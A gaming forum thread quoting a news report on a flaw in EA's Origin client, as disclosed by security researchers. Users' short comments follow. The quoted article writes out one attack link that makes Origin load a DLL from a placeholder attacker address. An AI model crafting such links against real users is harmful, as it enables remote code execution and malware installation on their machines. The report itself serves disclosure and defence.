Bug in EA’s Origin game platform allows attackers to hijack player PCs

Maniacal

Maniacal

the green Napoleon
Joined
Mar 13, 2005
Messages
18,778
Location
British Columbia, Canada
It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
Click to expand...

More on the link:

http://arstechnica.com/security/201...atform-allows-attackers-to-hijack-player-pcs/
 
Good stuff...take them up on their free EA game as compensation to Sim City buyers.
 
AlpsStranger said:
Oh FFS :lol:

God dammit EA! Why can't you just use Steam like everyone else?
Click to expand...
They did, but they've removed themselves from Steam once they unleashed their crappy client.
 
You must log in or register to reply here.

Similar threads

WildWeazel
  • Sticky
Welcome to C7: New Players Start Here
Replies
13
Views
9K
Lazy sweeper
Lazy sweeper
ArneHD
"How to hack an election", Election manipulation in South and Latin America
Replies
10
Views
3K
Valka D'Ur
Valka D'Ur
Aroddo
Bioware's reaction to fan outrage
Replies
14
Views
2K
Evie
Evie
z0wb13
  • Sticky
how to port windows civ4 to mac osx (10.6-10.10) using wine wrappers and run more mod
3 4 5
Replies
80
Views
94K
dguichar
dguichar
Methos
Aspyr Releases Civ V for Mac!
2
Replies
36
Views
11K
terrycrist3
T
Back
Top Bottom